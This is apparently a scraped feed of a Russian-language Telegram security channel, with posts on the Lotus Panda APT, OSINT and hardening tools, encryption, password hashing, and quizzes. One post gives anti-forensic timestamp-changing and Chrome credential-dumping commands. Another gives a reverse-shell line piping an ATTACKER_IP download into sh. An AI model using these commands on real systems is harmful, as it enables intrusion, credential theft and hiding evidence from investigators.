Lotus Panda: взломы госструктур ЮВА
👋
⏺ Группа Lotus Panda атаковала госструктуры и авиасектор в Юго-Восточной Азии с августа 2024 по февраль 2025. Под удар попали министерства, авиадиспетчеры, телеком и СМИ.
⏺ Как атакуют: Хакеры юзают легальные .exe от Trend Micro и Bitdefender, чтобы загружать вредоносные DLL. Основной инструмент - обновлённый Sagerunex для сбора и кражи данных. Также в ход идут reverse SSH и утилиты ChromeKatz/CredentialKatz, вытаскивающие куки и пароли из Chrome.
⏺ Маскировка и обход анализа: Для скрытности используют легальные тулзы: Zrok (удалённый доступ к внутренним сервисам) и
⏺ Что важно: Lotus Panda вообще не новички. С 2009 года они атакуют правительства, дипломатов и армию. Их стиль - это фишинг, эксплойты, легальный софт. Кампания показывает, что они продолжают развивать инструменты и расширяют зону охвата.
ZeroDay | #безопасность
Приветствую в мире цифровой безопасности!
Расскажу о APT-группировке Lotus-Panda.
datechanger.exe
(подмена таймстемпов). Это мешает аналитикам отследить точку входа, которая, кстати, до сих пор не найдена.ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11❤4🤯2😎1
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для пентестинга
👋
⏺ Zrok: легальный способ попасть во внутреннюю сеть: это инструмент от OpenZiti для шаринга локального сервиса через P2P-туннель. Используется даже легально в CI/CD, но в пентесте позволяет “протянуть” доступ к хосту без открытых портов.
⏺ datechanger.exe — запутываем аналитиков: Меняем таймстемпы файлов, чтобы затруднить расследование инцидента. Особенно полезно после дропа и запуска payload’а.
⏺ ChromeKatz: воровство куков и паролей в одну команду: Развитие идеи Mimikatz, но для браузера. Извлекает логины, куки и токены прямо из Chrome-профиля.
ZeroDay | #пентест
Приветствую в мире цифровой безопасности!
Расскажу о трех полезных фишках про пентесте.
zrok enable public --backed-by tcp --frontend-url tcp://:8080
# и получаем внешний endpoint
datechanger.exe -modify 01/01/2017 payload.exe
ChromeKatz.exe -dump
ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
❤14👍3🔥3
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16❤7👍6👎4
Как мессенджеры шифруют сообщения (end-to-end) на самом деле
То, что кажется магией в WhatsApp или Signal, на самом деле просто: пара ключей, немного математики и алгоритм ECDH. Вы пишете «Привет», и никто, кроме собеседника, не может это прочитать, даже сервер мессенджера.
⏺ В статье расскажут, как работает сквозное шифрование: от публичного и приватного ключа до симметричного shared secret, который нигде не хранится, но всегда создаётся заново. Показывают, как это устроено в браузере с Web Crypto API - прямо как у больших мессенджеров.
ZeroDay | #Статья
То, что кажется магией в WhatsApp или Signal, на самом деле просто: пара ключей, немного математики и алгоритм ECDH. Вы пишете «Привет», и никто, кроме собеседника, не может это прочитать, даже сервер мессенджера.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
😁15❤5💩4❤🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
BlackBird: массовый OSINT-поиск на 600 сайтах
👋
⏺ Что это: BlackBird — OSINT-инструмент, который прочёсывает ~600 сайтов в поисках заданного ника. Соцсети, платформы, маргинальные форумы - если человек где-то светился под этим именем, вы об этом узнаете.
⏺ В чём крутость: Это не браузерный кликер. BlackBird работает асинхронно, сразу стреляя пачкой HTTP-запросов.
На каждый запуск тут новый user-agent (а в пуле их больше тысячи), чтобы не словить бан.
Все шаблоны проверок — в data.json.
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!
Поговорим о еще одном инструменте безопасности.
На каждый запуск тут новый user-agent (а в пуле их больше тысячи), чтобы не словить бан.
Все шаблоны проверок — в data.json.
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11👍7😁2
Злоумышленники провели атаку «отравленными» адресами: отправили «пыль» (1.01 USDT) с кошелька, похожего на адрес контрагента жертвы.
Через минуту после пробной транзакции, пользователь получил «пыль» с фальшивого кошелька, копирующего оригинальный адрес в начале и в конце. Не проверив символы, он отправил $129 млн… прямо в руки мошенника.
Будьте в курсе сомнительных схем. На канале КоинКит — экспертные разборы, расследования и рекомендации по защите активов.
А еще обезопась себя с промокодом
Оставайтесь в безопасности с @coinkyt!
Please open Telegram to view this post
VIEW IN TELEGRAM
😁16❤5👍3👎2🔥2👏1
Боковые каналы: утечка данных без взлома
👋
⏺ Что это вообще такое: Это способ получить инфу не из самой системы, а из побочных эффектов её работы. Шум, электромагнитное излучение, время выполнения - всё это может выдать секреты.
Посмотрим на примеры таких атак:
1️⃣ Время отклика — сравнение задержек при обработке разных запросов помогает понять, какие данные лежат в памяти. Так работал [Timing Attack на TLS].
2️⃣ Энергопотребление — анализ колебаний напряжения в смарткартах позволял узнать зашифрованные PIN-коды.
3️⃣ Акустика — звук нажатий на клавиатуру позволяет восстановить вводимый текст с точностью до 90%.
4️⃣ Cache timing — атаки вроде Spectre и Meltdown используют особенности архитектуры CPU, чтобы читать память между процессами.
⏺ Чем опасно: Даже без доступа к системе можно получить приватную инфу. Часто такие атаки не логируются, а значит остаются незамеченными.
⏺ Можно ли защититься: Полностью - сложно, но можно снизить риск: делают алгоритмы с одинаковым временем выполнения, рандомизируют работу (например, вставляя шум или задержки), ограничивают физический доступ и учитывают такие атаки на этапе threat modeling.
ZeroDay | #sidechannel
Приветствую в мире цифровой безопасности!
Поговорим о не банальном векторе атаки - side-channel attacks.
Посмотрим на примеры таких атак:
ZeroDay | #sidechannel
Please open Telegram to view this post
VIEW IN TELEGRAM
❤20🤔1
Что считается атакой на цепочку поставок ПО (Supply Chain Attack)?
Anonymous Quiz
64%
Внедрение уязвимости через внешнюю библиотеку
13%
XSS в пользовательском интерфейсе
16%
SQL-инъекция в CMS
8%
Phishing для получения логина
This media is not supported in your browser
VIEW IN TELEGRAM
Защищаем Linux-сервер от lateral movement
👋
⏺ Блокируем лишний исходящий трафик: По умолчанию сервер может соединяться с любым адресом. Исправим:
⏺ Отключаем LLMNR и mDNS: Протоколы локального разрешения имён - подарок для атакующего. На проде не нужны:
⏺ Ограничиваем доступ к сокетам ядра: /proc и /sys — часто недооценённая угроза. Убираем излишнюю информацию:
⏺ Контролируем вход по SSH по UID: Создаём отдельного пользователя, которому разрешён доступ наружу, а всем остальным — нет:
ZeroDay | #безопасность
Приветствую в мире цифровой безопасности!
Сегодня расскажу, как закрыть сервер от “горизонтального перемещения” злоумышленника внутри сети.
# Оставим только DNS и APT
iptables -P OUTPUT DROP
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 443 -d deb.debian.org -j ACCEPT
echo "LLMNR=no" >> /etc/systemd/resolved.conf
systemctl restart systemd-resolved
# mDNS
systemctl stop avahi-daemon
systemctl disable avahi-daemon
mount -o remount,hidepid=2 /proc
chmod 700 /boot
iptables -A OUTPUT -m owner --uid-owner safeuser -j ACCEPT
iptables -A OUTPUT -j DROP
ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
❤24👍9🔥3🤡2
This media is not supported in your browser
VIEW IN TELEGRAM
Скрытые языки: как инженеры общаются без документации
👋
⏺ Почему это работает: Письменная документация устаревает, а внутренняя культура — нет. Она передаётся через pull-запросы, архитектурные шаблоны, и особенно через «мы всегда делали так».
⏺ Примеры скрытого языка на практике:
1️⃣ “Сначала Redis” — правило без описания
Redis — это система для быстрого хранения данных. У команды нет документа, что её нужно использовать первой, но в коде видно: если данных нет в Redis, мы идём в базу данных и потом кладём обратно в Redis. Это — негласный стандарт.
2️⃣ “Вся логика в switch": Вместо блок-схем и документации по архитектуре — конструкция switch, которая распределяет обработку по типам данных
3️⃣ deploy.sh как глас команды: CI/CD описан в устной традиции. Актуальный сценарий — это старый deploy.sh, где закодированы соглашения и порядок действий:
Новички по нему ориентируются. Он неточен, но всё ещё указывает направление.
ZeroDay | #безопасность
Приветствую в мире цифровой безопасности!
Сегодня расскажу, как в инженерных командах формируется негласный язык. Он нигде не зафиксирован, но по нему живёт и работает весь стек.
Redis — это система для быстрого хранения данных. У команды нет документа, что её нужно использовать первой, но в коде видно: если данных нет в Redis, мы идём в базу данных и потом кладём обратно в Redis. Это — негласный стандарт.
# Python
@router.get("/profile/{id}")
def get_profile(id: int):
cached = redis.get(id)
if cached:
return cached
profile = db.fetch(id)
redis.set(id, profile)
return profile
// Go
switch msg.Type {
case MsgCreate:
return s.handleCreate(msg)
case MsgDelete:
return s.handleDelete(msg)
default:
logger.Warn("unknown message", zap.String("type", msg.Type))
}
# Bash
docker build -t api .
docker push api
kubectl rollout restart deployment/api
Новички по нему ориентируются. Он неточен, но всё ещё указывает направление.
ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤6👌2🥰1
Данные на продажу: что происходит с инфой после утечек
То, что кажется просто новостью в ленте — «взломали, утекло» — на самом деле только начало всего. После утечки данные не пропадают. Их разбивают, упаковывают, торгуют ими - и всё это не где-то в кино, а на реальных теневых площадках, Telegram-серверах и в Discord-группах.
⏺ В статье рассказывают, как работает рынок украденных данных: кто продаёт и кто покупает, где торгуют, почему утечка может стоить $20 или $500, и зачем сама служба безопасности иногда выкупает свои же базы. Покажут, как выглядит сделка: от залитого архива до анонимной оплаты Monero.
ZeroDay | #Статья
То, что кажется просто новостью в ленте — «взломали, утекло» — на самом деле только начало всего. После утечки данные не пропадают. Их разбивают, упаковывают, торгуют ими - и всё это не где-то в кино, а на реальных теневых площадках, Telegram-серверах и в Discord-группах.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11👍7
Какая методика используется для оценки остаточного риска после внедрения защитных мер?
Anonymous Quiz
39%
ISO/IEC 27001
34%
OWASP SAMM
17%
STRIDE
10%
DREAD
🔥6👍2❤1
Platypus: менеджер обратных shell-сессий на Go
👋
⏺ Что это: Platypus - современный менеджер обратных shell-сессий на Go, который может запускать и управлять кучей подключений одновременно. В общем, можно забыть о вечных танцах с командной строкой. У Platypus есть и терминальный интерфейс, и веб-панель, и даже API, чтобы автоматизировать всё что угодно.
⏺ Установка максимально простая:
⏺ Или через Docker:
Готовая reverse shell-команда для жертвы:
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!
Поговорим о еще одном инструменте безопасности.
git clone https://github.com/WangYihang/Platypus
cd Platypus
make install_dependency
make release
./Platypus
docker-compose up -d
Готовая reverse shell-команда для жертвы:
curl http://ATTACKER_IP:13337/ | sh
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13🔥4
Defense in Depth — это концепция «многослойной защиты»: если один уровень пробит, следующий всё ещё держит оборону. Типо цифрового замка с несколькими дверями.
Вот как это работает по слоям
ZeroDay | #defenseindepth
Please open Telegram to view this post
VIEW IN TELEGRAM
❤16👍9
KDF: зачем хэшировать пароли сложно?
👋
⏺ Что это и зачем: KDF - целый подход, как сделать так, чтобы украденный хэш не превратился в пароль. Даже если база данных попала в руки хакера.
Вот в чём фишка:
1️⃣ Удорожание атаки
KDF тратит на каждый пароль больше времени/памяти. Это специально, чтобы брутфорс занял не минуты, а годы.
2️⃣ Соль (salt)
Каждому паролю добавляется уникальное значение. И теперь даже два одинаковых пароля → два разных хэша.
3️⃣ Итерации и память
KDF гоняет пароль через себя сотни тысяч раз. Условный SHA256 — почти бесплатен. KDF — нет.
4️⃣ Никаких rainbow-таблиц
Соль полностью ломает предрасчитанные таблицы. Даже у 123456 и admin теперь разный выход.
⏺ Почему это критично: Потому что даже «хешированная» база легко вскрывается, если вы использовали обычный MD5 или SHA1. GPU и специализированные ASIC-фермы проверяют миллионы хэшей в секунду. А вот хороший KDF останавливает даже их.
⏺ Примеры KDF, которые реально защищают:
• PBKDF2 — стабильный ветеран, до сих пор в протоколах TLS, Wi-Fi и enterprise-приложениях.
• scrypt — заточен под борьбу с GPU. Требует много памяти.
• Argon2 — современный стандарт, победитель Password Hashing Competition. Супер выбор на 2025 год.
ZeroDay | #кэширование
Приветствую в мире цифровой безопасности!
Сегодня разберём довольно важную, но часто недооценённую тему: функции derivation ключей, или KDF (Key Derivation Function)
Вот в чём фишка:
KDF тратит на каждый пароль больше времени/памяти. Это специально, чтобы брутфорс занял не минуты, а годы.
Каждому паролю добавляется уникальное значение. И теперь даже два одинаковых пароля → два разных хэша.
KDF гоняет пароль через себя сотни тысяч раз. Условный SHA256 — почти бесплатен. KDF — нет.
Соль полностью ломает предрасчитанные таблицы. Даже у 123456 и admin теперь разный выход.
• PBKDF2 — стабильный ветеран, до сих пор в протоколах TLS, Wi-Fi и enterprise-приложениях.
• scrypt — заточен под борьбу с GPU. Требует много памяти.
• Argon2 — современный стандарт, победитель Password Hashing Competition. Супер выбор на 2025 год.
ZeroDay | #кэширование
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13👍6👌2🤮1
Что отслеживает UEBA-система?
Anonymous Quiz
19%
Уязвимости в ПО
23%
Распределение прав доступа
50%
Поведение пользователей и устройств
8%
Доступ к сетевым принтерам
😁65👨💻4❤3👾2